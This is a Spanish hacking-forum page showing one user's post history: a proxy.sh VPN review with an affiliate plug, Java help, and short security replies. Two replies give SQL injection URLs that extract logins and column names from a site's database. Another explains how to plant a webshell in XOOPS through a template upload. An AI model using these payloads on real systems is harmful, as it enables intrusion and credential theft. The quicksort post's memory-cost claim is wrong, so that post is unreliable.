elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 28
1  Seguridad Informática / Seguridad / VPNs, anonimato, seguridad y proxy.sh en: 26 Octubre 2013, 10:41 am

Hacía mucho que no escribia nada (tanto que hasta olvide mi contraseña) y quería presentaros una herramienta, la cual considero realmente útil, barata y a estas alturas indispensable para cualquier persona que aprecie su privacidad. La herramienta en cuestión se llama proxy.sh, al contrario de lo que pueda parecer por su nombre proxy.sh es un sistema de servidores VPN que ofrece una serie de servicios por los cuales destaca.

En primer lugar proxy.sh tiene una política de privacidad extremadamente buena, en sus servidores sólo se almacena el correo electrónico que se les de durante el registro, esto quiere decir que no quedan registradas direcciones IP al conectarse a los servidores VPN ni al realizar el registro en su web, lo cual es un punto a favor, el único registro posible en el que puede aparecer la dirección IP es en el registro correspondiente al pago de sus mensualidades, el cual se realiza a traves de un tercero, y puede ser este tercero el que almacene tus datos.

En cuanto a la disposición de los pocos datos tuyos que tengan a terceros proxy.sh lo dice muy claro: "Usually we will not respond to demands from any third party, including governmental institutions". Sin embargo si que es cierto que realizan tres restricciones a esta regla, tus datos serán facilitados a terceros en caso de que estes acusado de pedofilia, daños a terceros y extremismos políticos o religiosos. Cabe destacar a estas alturas que a pesar de que todos los programas que hay en los servidores estan configurados para no dejar logs, ademas, estos corren en RAM con lo cual cada vez que se reinicia el servidor se pierden los posibles datos. (Si si en daños a terceros se incluye hacking, de echo hace poco hubo una noticia relaccionada con ellos que se puede leer en THN).

Cabe destacar de esta VPN que tiene su base en las islas Seychelles con lo cual como entidad jurídica no se ve sujeta a leyes tales como el acta patriótica que nos aleja un poco de las posibles interferencias de nuestras comunicaciones por parte de los EEUU (para los mas paranoicos).

Proxy.sh usa un sistema de cifrado RSA de 1024bits cuya contraseña cambia cada hora, como se puede leer en su página web en un sistema basado en OpenVPN-TCP:
 "For encryption the cipher in use is CBC mode of Blowfish with encryption strength of 128bit, hash algorithm is 160bit SHA1, and the control channel is same TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA. Our 1024 bit RSA key is changing every hour, preventing most advanced hackers and covert teams part of governmental agencies from breaking through."

En definitiva para mi proxy.sh es una opción realmente buena y eficiente si lo que queremos es anonimizar nuestro acceso a internet ya que protege bastante mas que un proxy y de momento no depende de otros usuarios como la red TOR para garantizar el anonimato, evitando que usuarios malintencionados puedan realiazar un robo de información. Ofrece múltiples servidores y una web donde se puede ver en tiempo real el estado de los servidores y un mapa en el cual se puede observar la localización de los mismos. En cuanto al funcionamiento de la VPN no tiene ninguna novedad, funciona igual que el resto de VPNs.




En lo referente a los pagos para todos los que somos de la península es cierto que la tarifa mas barata es la de 10 dólares mensuales que ofrece un ancho de banda de hasta 200Gbps pero haciendo el cambio a euros es aproximadamente 7 euros con 40 centimos, un gasto bastante superfluo teniendo en cuenta los servicios que nos ofrece. Para toda la comunidad latinoamericana creo que pueden elegir la tarifa de 5 dolares mensuales que da, si no me equivoco, hasta 100Gbps de todos modos las diferencias entre las tarifas son mínimas y se pueden encontrar aquí, destacar tambien que soporta hasta 90 tipos de pagos.

Si hablamos de la configuración esta es realmente facil y dan soporte a multiples plataformas, entre las que podemos encontrar: linux, ios, android, blackberry, windows phone, apple, xbox 360, ps3, cisco, aix, oracle y dd-wrt. Aunque por supuesto para uso casero, en dispositivos fijos, siempre que tengamos soporte en el router para VPN lo mejor creo que es configurar nuestro ruter para que use VPN con lo que quedarian protegidos todos los sistemas conectados a esta red.

En especial recomiendo éste servicios para los usuarios de telefonía movil ya que protege los datos de posibles filtraciones en redes wifi públicas, es decir, si alguien intentase interceptar, por ejemplo con un man in the middle, el tráfico saliente de tu maquina se encontraría con un tráfico cifrado realmente dificl de descifrar. Tanto para android como para ios proxy.sh ofrece aplicaciones con las cuales se redireccionará el tráfico de tu movil hacia la VPN, ambas aplicaciones son realmente fáciles de configurar.

Por último decir que proxy.sh ofrece tutoriales y guías para configurar nuestros dispositivos de todas las maneras posibles, las diferentes guias se pueden encontrar en este enlace, en cuanto a las FAQs las podemos encontrar aquí además ofrecen un soporte a traves de un sistema de tickets que es realmente rápido y bastante amable, para contactar con ellos se puede acceder a este link.

Ademas proxy.sh ofrece la posibilidad de que establezcas alguno de sus servidores como nodo de salida de la red TOR lo cual incrementaria la anonimicidad de todas tus conexiones (ver manual aquí) o como nodo de entrada.



Preguntillas:

¿Que opinais sobre su política de privacidad?
¿Que opinais sobre las VPN, estoy en lo cierto y son la mejor manera de protegerse contra posibles mitm?
¿Combinariais VPN + TOR?¿Como nodo de salida o de entrada?
¿Que opinais del cifrado que ofrece proxy.sh?
¿Es realmente útil para el anonimato, o con PRISM estamos todos pringados?
¿Alguien ha encontrado algún otro servicio VPN con mejores prestaciones y menor o igual precio?



Ninguno de los enlaces anteriores debería de ser mi enlace de afiliado, si te ha gustado el producto, crees que es de utilidad y vas a contratar sus servicios puedes echarme una mano usando mi enlace de afiliado.

Articulo publicado siguiendo las normas estipuladas en CAREN v1.0.

Un saludo,
Søra.
2  Seguridad Informática / Hacking / Re: Acceso a la red local del servidor de Yahoo a traves de Yahoo QL en: 14 Julio 2013, 13:07 pm
Jajajajaajaj, por lo menos tienen sentido del humor :D
3  Seguridad Informática / Bugs y Exploits / Re: Probando inyecciones SQL - Columnas ocultas en: 9 Julio 2013, 17:29 pm
Código:
http://www.miurl.com.br/vcartas.php?mid=-1+UNION+SELECT+1,2,group_concat%28id,0x3a,login%29,6,5,6,7,8,9+from+usuarios--

la pass? :O
4  Seguridad Informática / Bugs y Exploits / Re: Probando inyecciones SQL - Columnas ocultas en: 9 Julio 2013, 09:33 am
Antes de ver las columnas tendras que especificar la tabla no?

Código:
http://www.miurl.com.br/vcartas.php?mid=-1+UNION+SELECT+1,2,group_concat(column_name),6,5,6,7,8,9+from+information_schema.columns+where+table_name=0x(valorHexDelNombreDeLaTabla)--

un saludo!
5  Programación / Java / Re: (ayuda) me pueden ayudar con el pseudocodigo de este applet en: 8 Julio 2013, 23:30 pm
Vector de objetos de tipo "Apuesta" parametros de: estado de la apuesta, vector con los corredores que han apostado, si ha acabado la apuesta o no, coste de la apuesta....

Vector de objetos de tipo "Corredor" parametros de: montante apostado, suma de dinero total ganada, apuestas activas(booleano)

Mientras entrada distinto!=fin

SI (el corredor) tiene apuesta 
   Mientras apuesta[j].!acabada() {
   Int dinero = pagarapuesta(corredor,j);
   actualizarDineroCorredor(i,dinero);
  }
}

Si entrada=nuevaApuesta {
  create.nuevaApuesta()
}

Si entrada=nuevoCorredor {
  create.nuevoCorredor()
}

Si entrada=consulta {
  devuleveDatosCorredor();
}

Si entrada= actualizarValorApuesta {
      cambiar.Valor(nuevoValor);
}

}

etc....
un saludo!

 
6  Programación / Java / Re: Baraja de cartas en java en: 8 Julio 2013, 22:50 pm
Haber, tienes una clase "Casino" que gestiona objetos de otra clase "Baraja" mediante un vector(array) esa clase tiene que gestionar un objeto "Carta".
Ahora bien cada objeto debe de tener unos parametros;

Casino tendra un parametro que será el vector(array) de barajas y quizas otro con el estado de las barajas, quizas barajas activas o no activas, usadas o no usadas etc..

El objeto baraja tendra el vector(array) de 52 cartas, y quizas tambien un vector con booleanos cartas que han salido y que no o cartas descubiertas o quiza un vector de ints con el numero de jugador que tiene cada carta o un 0 si está en un mazo...

Y luego el objeto carta que tendra asignado un número para ver que carta es.

Haber eso es lo que creo yo.
Un saludo!
7  Programación / Java / Re: [Opinión] Metodo de ordenamiento rápido. en: 8 Julio 2013, 22:31 pm
El mejor método para ordenación de números es quicksort, lo he probado como parte de un proyecto de coste de algoritmos, te dejo en el pastebin una lista con tiempos de ejecucion de varios algoritmos de ordenacion en funcion de la longitud de la tabla, de el tipo de numeros (enteros/reales) y de la ordenacion anterior ...

¿Sabes calcular el coste en tiempo de un algoritmo?
Básicamente el coste en tiempo del método quick sort es O(n*log(n)) mientras que el de otro
como el de seleccion es de O(n*n), con n=T.length

De todos modos el coste en memoria sera mayor el del recursivo porque el orden del quicksort es O(n*n) y el de los no recursivos de O(n), pero vamos que en memoria no te importe porque como mucho te dara un stavkoverflow pero deberías de trabajar con millones de datos asique... nose si algun dia trabajas con muchísimos millones de datos es posible que el quicksort pete tu ordenador pero millones millones...

Un saluuudo!
Documentacion sobre coste de algoritmos here.
8  Seguridad Informática / Nivel Web / Re: Subir webshell a un sistema XOOPS en: 8 Julio 2013, 14:16 pm
Sorry por el doblepost.

Las plantillas(templates) se suben como un .tar.gz Xoops los descomprime y los guarda como una plantilla mas, subiendo tu shell comprimida en un .tar.gz probablemente la encuentres descomprimida en el sistema.

Leido en Waraxe.

un saludo!

9  Seguridad Informática / Nivel Web / Re: Source Download en: 8 Julio 2013, 12:39 pm
Logs del sistema, registro de conexiones externas? Configuración de apache? Otras configuraciones?...

Un saludo!
10  Seguridad Informática / Hacking / Re: Acceso a la red local del servidor de Yahoo a traves de Yahoo QL en: 4 Julio 2013, 11:15 am
Verdaderamente bueno WHK, Una duda ¿Lo has reportado a yahoo?

Un saludo!
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 28
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines